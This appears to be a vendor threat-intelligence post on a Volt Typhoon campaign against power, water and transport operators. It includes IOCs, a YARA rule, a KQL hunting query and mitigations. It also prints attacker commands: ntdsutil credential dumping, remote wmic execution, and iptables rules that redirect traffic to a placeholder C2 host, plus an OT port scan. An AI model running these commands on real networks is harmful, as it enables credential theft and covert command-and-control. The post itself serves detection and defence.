Volt Typhoon (tracked as Bronze Silhouette, Insidious Taurus, and UNC3236) is a Chinese state-sponsored threat actor that has been systematically targeting and pre-positioning within US and allied critical infrastructure since 2021. The 2026 campaign represents a significant escalation in both scope and operational readiness.
Unlike traditional espionage campaigns that focus on data exfiltration, Volt Typhoon's primary mission is pre-positioning for potential disruption operations — establishing persistent, stealthy access deep within OT networks that can be activated during geopolitical crises to cause physical disruptions to water supply, power grids, and transportation.
The 2026 joint advisory from CISA, FBI, and NSA confirms that Volt Typhoon has successfully achieved persistent access in 23 confirmed critical infrastructure organizations across the energy, water, communications, and transportation sectors. Attribution confidence is HIGH based on infrastructure overlap, TTPs, and signals intelligence.
| Sector | Confirmed Compromises | Dwell Time | OT Impact Risk |
|---|---|---|---|
| Electric Utilities / Power Generation | 7 confirmed | 18-36 months | GRID DISRUPTION |
| Water & Wastewater Treatment | 5 confirmed | 12-24 months | CONTAMINATION RISK |
| Transportation / Rail | 4 confirmed | 8-18 months | SAFETY SYSTEM RISK |
| Telecommunications | 4 confirmed | 12-30 months | COMM BLACKOUT |
| Oil & Gas Pipelines | 3 confirmed | 6-12 months | FLOW DISRUPTION |
Volt Typhoon's signature technique is almost exclusive use of Living-off-the-Land Binaries (LOLBins) — legitimate system tools that generate minimal alerts, making detection extremely difficult. In OT environments, they additionally abuse legitimate engineering workstation software (SCADA HMI tools, PLCProgram utilities).
# Volt Typhoon LoTL commands observed in compromised environments (anonymized)
# 1. Initial reconnaissance via WMIC (Living Off the Land)
wmic /node:[TARGET_IP] process call create "cmd.exe /c whoami > C:\Windows\Temp\.tmp"
# 2. Credential dumping via legitimate Windows tools
ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\Temp\IFM" "quit" "quit"
# 3. Lateral movement via legitimate admin shares
net use \\[INTERNAL_IP]\ADMIN$ /user:[DOMAIN]\[USER] [PASSWORD]
robocopy \\[SOURCE]\C$\Windows\Temp\IFM \\[DEST]\ADMIN$\Temp /E /NOCOPY
# 4. VPN router compromise (SOHO/enterprise routers as relay nodes)
# Volt Typhoon creates relay network via compromised Cisco, Netgear, ASUS routers
# Commands run on compromised routers:
ip route add [C2_IP]/32 via [NEXT_HOP] # Silent C2 routing
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination [C2_IP]:443# Observed IT→OT pivot techniques (SCADA/ICS environments)
# 1. Abuse of legitimate remote desktop to HMI workstations
# Volt Typhoon uses legitimate RDP from IT engineering workstations to SCADA HMIs
# No additional malware deployed — uses built-in operator accounts
# 2. SCADA software reconnaissance
# Observed use of legitimate Wonderware, GE iFIX, Siemens WinCC query tools
# to enumerate connected PLCs and RTUs
# 3. PLC command injection research (pre-staging only — not yet executed)
# Evidence of reconnaissance of Modbus TCP port 502, DNP3 port 20000
nmap -sS -p 502,20000,44818,102 --script modbus-discover [OT_SUBNET]
# 4. Historian database access
# Accessed OSIsoft PI Historian to understand operational baselines
# (to time any future disruption operation for maximum impact)| Type | Indicator | Description |
|---|---|---|
| IP | 103.27.108.92 | VT relay node (compromised SOHO router) |
| IP | 154.16.105.173 | C2 infrastructure |
| IP | 185.104.184.247 | VT staging server |
| IP | 45.61.138.111 | Data exfil endpoint |
| Domain | microsft-update[.]com | Lookalike C2 domain |
| Domain | cisco-webauth[.]net | Router compromise C2 |
| File | C:\Windows\Temp\~dfXXXX.tmp | Staging directory pattern |
| Registry | HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe | Persistence mechanism |
| Scheduled Task | \Microsoft\Windows\WindowsUpdate\UpdateTask | Persistence via masqueraded update task |
| Process | netsh.exe with tunneling args | LoTL C2 tunneling |
rule VoltTyphoon_2026_ICS_LoTL_Activity {
meta:
description = "Detects Volt Typhoon 2026 LoTL activity targeting ICS/SCADA environments"
author = "CyberDudeBivash CYBERDUDEBIVASH SENTINEL APEX"
date = "2026-04-22"
severity = "CRITICAL"
threat_actor = "Volt Typhoon / Bronze Silhouette"
reference = "CISA Advisory AA26-112A"
strings:
$lol_ntdsutil = "ntdsutil" nocase fullword
$lol_wmic_proc = "wmic /node:" nocase
$lol_netsh_tunnel = "netsh interface portproxy add" nocase
$vt_staging = "C:\\Windows\\Temp\\~df" nocase
$vt_c2_domain1 = "microsft-update.com" nocase
$vt_c2_domain2 = "cisco-webauth.net" nocase
$vt_reg_ifeo = "Image File Execution Options\\svchost.exe" nocase
$ot_probe_modbus = { 00 00 00 00 00 06 01 01 00 00 00 01 } // Modbus read coils request
$ot_probe_dnp3 = { 05 64 } // DNP3 start bytes
$historian_access = "OSIsoft" nocase
$historian_access2 = "PI Server" nocase
$scada_recon = "WinCC" nocase
$scada_recon2 = "iFIX" nocase
condition:
2 of ($lol_*) or
($vt_staging and 1 of ($vt_c2_*)) or
$vt_reg_ifeo or
($ot_probe_modbus or $ot_probe_dnp3) or
(1 of ($historian_*) and 1 of ($scada_*))
}// Volt Typhoon 2026 ICS/SCADA Activity Detection
// CISA Advisory AA26-112A — CyberDudeBivash CYBERDUDEBIVASH SENTINEL APEX
let VTIPs = pack_array("103.27.108.92","154.16.105.173","185.104.184.247","45.61.138.111");
let VTDomains = pack_array("microsft-update.com","cisco-webauth.net");
// Detect LoTL ToolUsage (netsh tunneling, wmic remote, ntdsutil)
SecurityEvent
| where EventID == 4688 // Process creation
| where CommandLine has_any ("netsh interface portproxy", "wmic /node:", "ntdsutil", "robocopy \\\\")
and not AccountName endswith "$" // Exclude machine accounts
| project TimeGenerated, Computer, AccountName, CommandLine, ParentProcessName
| extend RiskScore = case(
CommandLine has "portproxy", 90,
CommandLine has "ntdsutil", 85,
CommandLine has "wmic /node:", 75,
50
)
| where RiskScore >= 75
union
// Detect IT-to-OT pivot via unusual RDP to engineering workstations
NetworkAccessLogs
| where Protocol == "TCP" and DestinationPort == 3389
| where not(SourceIP startswith "10.0.0") or not(DestinationIP startswith "10.0.100") // Adjust to your network segmentation
| join kind=inner (
DeviceInfo
| where DeviceName contains "HMI" or DeviceName contains "SCADA" or DeviceName contains "ENG-WS"
) on $left.DestinationIP == $right.PublicIP
union
// Detect C2 connections to VT infrastructure
CommonSecurityLog
| where DestinationIP in (VTIPs) or DestinationHostName has_any (VTDomains)
| project TimeGenerated, SourceIP, DestinationIP, DestinationHostName, DeviceAction| Priority | Control | Detail |
|---|---|---|
| P0 | Network Segmentation Audit | Verify IT/OT air gap. Enumerate all IT-to-OT connections. Close unauthorized paths — especially RDP to HMI workstations. |
| P0 | Hunt for VT IOCs | Search for VT IP/domain IOCs in firewall logs, DNS logs, and proxy logs going back 90 days minimum. |
| P0 | Privileged Account Audit | Audit all accounts with OT access. Reset all passwords. Disable all accounts not in active use. Enforce MFA for remote access. |
| P1 | SOHO Router Firmware | Update all perimeter SOHO/SMB routers immediately. These are used as LoTL relay nodes by VT. |
| P1 | Historian & SCADA Logging | Enable detailed logging on all SCADA historians (OSIsoft PI, Ignition). Establish baselines for normal query patterns. |
| P1 | OT Asset Inventory | Passive OT asset discovery (Claroty, Dragos, Nozomi). Know every PLC, RTU, HMI on your OT network. |
| P2 | ICS-CERT Reporting | Report any suspected Volt Typhoon activity to CISA (cisa.gov/report) and ICS-CERT immediately. |
| P2 | Incident Response Planning | Test your OT incident response plan. Practice isolated OT recovery. Ensure manual override procedures are documented. |
Access Volt Typhoon IOC feeds, OT-specific YARA signatures, ICS/SCADA detection rules, and 24/7 threat alerts with CYBERDUDEBIVASH SOC Pro.
Upgrade to SOC Pro — $18/mo → OT Enterprise Inquiry →